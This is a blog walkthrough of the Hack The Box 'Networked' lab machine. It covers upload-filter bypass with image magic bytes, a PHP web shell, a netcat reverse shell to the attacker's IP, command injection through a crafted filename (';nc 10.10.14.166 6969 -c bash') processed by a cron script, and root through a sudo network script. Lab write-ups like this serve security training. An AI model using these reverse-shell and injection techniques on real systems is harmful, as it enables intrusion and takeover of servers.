Hack The Box – Networked Box Writeup By Nikhil Sahoo

Introduction

Back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Networked which retired very recently. It was actually a fairly easy box and was based on the Linux machine.So without further ado let’s begin…

Recon

We’ll start with our recon by doing a Nmap scan.

nmap -sC -sV 10.10.10.146

 

As we can see that port 80 is open so let’s check that first in our browser.

Nothing interesting. Running dirb over it we get the /backup file which will be downloaded as a tar file.

 

Exploitation

So it gives us 4 php files. upload.php seems interesting so let’s see if it is available in the box.

So it does exists and the first thing that should come to our mind is to upload our reverse shell. Let’s try that out.

But it only takes a valid image file, we can try inserting the magic bytes at the beginning of the file and change the extension accordingly. Here is a list of all the magic bytes. I have used jpg magic bytes: “ÿØÿà..JFIF..”

You can use any desired php reverse shell.

 

And it got uploaded, now the next painful task is to find the path of the uploaded image/shell. But if we recall, that backup file contained a PHP file named photos.php. Let’s navigate there

We can see our uploaded shell here… Let’s open it in a new tab and try giving the cmd parameter to it to check for code execution.

It does work! Now let’s open up our listener and place the Netcat command in the cmd parameter for the reverse shell: nc 10.10.14.166 4848

 

Let’s move to the home directory and try to read the user flag.

Oops, Permission Denied.

Probably we have to get it through another user.

On checking the crontab.guly file we see that it’s running the check_attack.php file every 3 minutes.

 

Let’s analyze the code of check_attack.php

 

In short this code checks for any files that are not in the ip address format (checking is done by check_ip function present inside lib.php) in the /uploads/ directory of the webserver and if it finds then it deletes that file along with sending a mail.

Here is the command via which it is deleting it:

exec(“nohup /bin/rm -f $path$value >/dev/null 2>&1 &”)

But what if we append another command by terminating the first command like this:

exec(“nohup /bin/rm -f “anyfile.txt;nc 10.10.14.166 6969″ >/dev/null 2>&1 &”)

If this works then we should be getting our reverse shell.

So try creating a new file named as “;nc 10.10.14.166 6969 -c bash”

and lets’s open our listening port at 6969 and wait for around 3 minutes,

And we got our user shell and the user flag.

Privilege Escalation

Now moving on for our root flag.

Let’s try first with a sudo -l to check what all commands guly user can run as sudo.

 

As per the above output, the user guly can execute changename.sh present inside /usr/local/sbin/

Let’s try to read that bash script

So basically it is taking user input for its 4 variables specified above and tries creating a new interface guly0. This is where I got a kind of stuck…

But there’s a vulnerability in the Redhat/CentOs network scripts that it could execute any other command place after it with a space like this:

Nikhil whoami

In this case, it would execute the whoami command as root.

You can find more details here.

So try running the bash file with sudo and when it asks for an interface name just type in anything followed by a space then the /usr/bin/bash which will run as root and will give us the bash shell. For other parameters type in anything.

 

 

Thus we got our root flag. For more clarity let’s look at the ifcfg-guly file specified in the bash script.

 

That explains it all.

So that’s for now. See you next time. Goodbye

You can have a look at my previous article on Hack The Box: Jarvis Box Walkthrough. Here is the link of the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff  ?

For any queries you can send a Hi to my Linkedin Handle: Here

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *